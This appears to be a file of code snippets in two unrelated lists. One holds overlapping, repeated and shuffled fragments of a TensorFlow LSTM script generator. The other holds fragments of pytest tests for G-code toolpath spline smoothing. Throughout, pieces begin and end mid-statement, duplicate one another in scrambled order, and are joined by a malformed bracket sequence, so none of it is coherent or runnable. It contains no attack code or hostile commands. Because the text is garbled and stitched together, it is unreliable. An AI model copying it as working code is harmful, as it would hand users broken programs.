"self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess,",
"var) for grad, var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer",
"dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get Prediction",
"name=\"learning_rate\") return (p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size)",
"[None, None], name=\"input\") p_targets = tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\")",
"os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import seq2seq class NeuralNetwork(): def get_inputs(self): p_input",
"0 or epoch_i == num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i + 1) if",
"return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32)",
"int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text,",
"batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time",
"== num_epochs - 1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state,",
"':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in range(gen_length): # Dynamic Input",
"[prime_word + ':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in range(gen_length): #",
"build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab)",
"% test_every == 0 or epoch_i == num_epochs - 1): test_final_state, test_probs =",
"print('Epoch {:>3}/{} train_loss = {:.3f}, time so far {}, estimated to finish {}'",
"state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x, y) in enumerate(batches): feed =",
"vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected =",
"= loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return",
"estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far) print('Epoch {:>3}/{}",
"1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs,",
"optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate,",
"sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x, y) in enumerate(batches): feed = { self.input_text:",
"int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs, learning_rate, save_every,",
"'\"'] else '' tv_script = tv_script.replace(' ' + token.lower(), key) tv_script = tv_script.replace('\\n",
"save_dir, epoch_number): saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory)",
"sess, save_dir, epoch_number): saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory):",
"fully_connected) return (fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph()",
"self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer =",
"saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory)",
"= seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr)",
"logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient",
"class NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets = tf.placeholder(tf.int32,",
"train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph)",
"Input dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get",
"(x, y) in enumerate(batches): feed = { self.input_text: x, self.targets: y, self.initial_state: state,",
"tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph =",
"= optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var in gradients]",
"= len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state =",
"dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\") return (outputs, final_state) def build_nn(self, cell, rnn_size, input_data,",
"total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1) -",
"1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f}, time so far {}, estimated",
"self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities for",
"epoch_i == num_epochs - 1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph,",
"vocab_size) # Probabilities for generating words probs = tf.nn.softmax(logits, name='probs') # Loss function",
"for n in range(gen_length): # Dynamic Input dyn_input = [[vocab_to_int[word] for word in",
"= [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get Prediction probabilities,",
"tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets = tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32,",
"vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected',",
"as tf import timeit import datetime import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL']",
"= tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate, epoch_i): return",
"= self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab, sess, text_processor.token_dict, seq_length) print(\"*********************************************************************************************\") print(tv_script) print(\"*********************************************************************************************\")",
"rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr",
"layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities for generating words",
"np.array([[1]])}) for n in range(gen_length): # Dynamic Input dyn_input = [[vocab_to_int[word] for word",
"tensorflow as tf import timeit import datetime import numpy as np import os",
"' '.join(gen_sentences) for key, token in token_dict.items(): ending = ' ' if key",
"= [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients)",
"def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def",
"token_dict, seq_length): print('Generating new text with prime word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph)",
"== 0 or epoch_i == num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i + 1)",
"def save_trained_model(self, sess, save_dir, epoch_number): saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if",
"save_dir, epoch_i + 1) if (epoch_i % test_every == 0 or epoch_i ==",
"len(dyn_input[0]) # Get Prediction probabilities, prev_state = sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state:",
"print('Running {} batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i in range(num_epochs): state",
"save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train",
"inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\") return (outputs,",
"= tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm",
"batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as",
"timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs *",
"+ 1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f}, time so far {},",
"train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch {}', batch_i) summary",
"print('Ran batch {}', batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer()",
"var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph)",
"self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits,",
"text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {} batches",
"with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches)))",
"cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\") return",
"pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script = ' '.join(gen_sentences) for",
"{:.3f}, time so far {}, estimated to finish {}' .format(epoch_i + 1, num_epochs,",
"epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and saved to {}.'.format(full_save_directory))",
"self.train_op], feed) print('Ran batch {}', batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time",
"p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] *",
"self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping",
"summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr =",
"tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var)",
"final_state = self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected,",
"['\\n', '(', '\"'] else '' tv_script = tv_script.replace(' ' + token.lower(), key) tv_script",
"capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var in gradients] self.train_op =",
"self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab, sess, text_processor.token_dict, seq_length) print(\"*********************************************************************************************\")",
"in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def",
"activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph",
"p_targets = tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets,",
"sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in range(gen_length): # Dynamic Input dyn_input = [[vocab_to_int[word]",
"saver.save(sess, full_save_directory) print('Model trained and saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state,",
"(outputs, final_state) def build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size)",
"{}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating",
"= loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from",
"self.targets, self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count)",
"total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f}, time so far {}, estimated to finish",
"def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating new",
"initial_state) def get_embed(self, input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return",
"= tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state) def",
"not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and saved to {}.'.format(full_save_directory)) def generate_test_script(self,",
"tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count,",
"dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script =",
"learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer())",
"= len(dyn_input[0]) # Get Prediction probabilities, prev_state = sess.run( [test_probs, test_final_state], {self.input_text: dyn_input,",
"1) if (epoch_i % test_every == 0 or epoch_i == num_epochs - 1):",
"{:>3}/{} train_loss = {:.3f}, time so far {}, estimated to finish {}' .format(epoch_i",
"'(') return tv_script def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return",
"' ' if key in ['\\n', '(', '\"'] else '' tv_script = tv_script.replace('",
"with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text)",
"in range(gen_length): # Dynamic Input dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length"
"Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data,",
"plotter(data) def test_135_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y100\" ],",
"the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg",
"np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"\"G1 X50 Y50\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data,",
"0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1",
"else: line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0) assert self.spline.distance(spline) <= line_dist and",
"else: assert False, \"Invalid start type\" if start == \"start\" and end ==",
"s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"xy_lengths[l] if l < data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length",
"line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5)",
"== self.spline_start, \\ \"The previous segment does not end where the current one",
"np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100,",
"self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self, spline, line): msg",
"start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert",
"generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths)",
"pytest.approx(line_dist, abs=0.1), \\ msg def check_start_point_start(self): msg = \"The start point of the",
"== \"end\": checker.check_line_start_point_end() else: assert False, \"Invalid start type\" if start == \"start\"",
"data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 Z10\", \"G1 X0",
"\"The end point of the spline segment is not on the line\" def",
"this line is very short straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3,",
"p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\" )",
"not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def",
"segment does not end where the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert",
"start=\"end\", end=\"end\") straight_segment(data, l=3, s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths)",
"def __init__(self,data, l, s, start, end, corner): self.data = data self.s = s",
"spline segment is not on the end of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg)",
"start, end): checker = SegmentChecker(data, l, s, start, end, False) if start ==",
"end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"on\") corner_segment(data, l=1,",
"0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \\ \"The previous segment does",
"end self.start_point = data.start_xy[l] self.end_point = data.end_xy[l] if l != data.start_xy.shape[0] - 1:",
"data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid",
"start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) )",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def",
"0.5) def check_point_on_line(self): msg = \"The middle point of the spline segment is",
"\"The end point of the spline segment is not on the middle of",
"= data self.s = s self.start = start self.end = end self.start_point =",
"= \"The start point of the spline segment is not on the line\"",
"np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data)",
"straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4,",
"self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous",
"X100 Y0\", \"G1 X200 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"l=1, s=3, start=\"end\", end=\"end\") straight_segment(data, l=3, s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300",
"self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg = \"The",
"is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12),",
"msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg = \"The middle point of the spline",
"the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def",
"X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1,",
"one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) ==",
"0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]) +",
"start distance does not match\" if line <= 1.0: line_dist = self.start_line_dist +",
"self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\ msg def check_start_point_start(self): msg = \"The start point",
"Y0\", \"G1 X30 Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"start == \"middle\": checker.check_line_start_point_middle() elif start == \"end\": checker.check_line_start_point_end() else: assert False, \"Invalid",
"self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg = \"The end point",
"figures.append(p) return plot def point_on_line(linea, lineb, point): return np.linalg.norm(linea - point) + np.linalg.norm(lineb",
"if end == \"end\": checker.check_end_point_end() elif end == \"on\": checker.check_end_point_on() elif end ==",
"data.start_xy[l] self.end_point = data.end_xy[l] if l != data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1]",
"\"G1 X100 Y0\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data,",
"check_distance(self, spline, line): msg = \"The spline start distance does not match\" if",
"\"The end point of the spline segment does not match the line end",
"data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s]",
"abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100",
"start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data)",
"np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\",",
"def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def",
"- self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid))",
"= generate_curves([ \"G1 X50 Y50\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"= np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l < data.start_xy.shape[0] - 1: self.start_next_line_dist =",
"abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20",
"assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg = \"The start point of",
"\\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous segment end distance and the current segment",
"self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg = \"The start point of the",
"SegmentChecker(object): def __init__(self,data, l, s, start, end, corner): self.data = data self.s =",
"\"on\": checker.check_corner_end_point_on() elif end == \"middle\": checker.check_corner_end_point_middle() else: assert False, \"Invalid end type\"",
"self.spline = data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0",
"pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1",
"is very short straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\")",
"checker = SegmentChecker(data, l, s, start, end, True) checker.check_corner_spline_order() if start == \"on\":",
"2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l]",
"\"G1 X10 Y0\", \"G1 X20 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg",
"start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert",
"(line-1.0) assert self.spline.distance(spline) <= line_dist and \\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\ msg",
"assert False, \"Invalid start type\" if start == \"start\" and end == \"end\":",
"+ 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid",
"X10 Y0\", \"G1 X20 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"spline segment is not on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point,",
"= self.start_next_line_dist + self.next_line_length * (line-1.0) assert self.spline.distance(spline) <= line_dist and \\ self.spline.distance(spline)",
"s=3, start=\"on\", end=\"on\") straight_segment(data, l=2, s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert",
"np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1])",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data",
"start=\"on\", end=\"end\") straight_segment(data, l=1, s=3, start=\"end\", end=\"end\") straight_segment(data, l=3, s=4, start=\"start\", end=\"end\") assert",
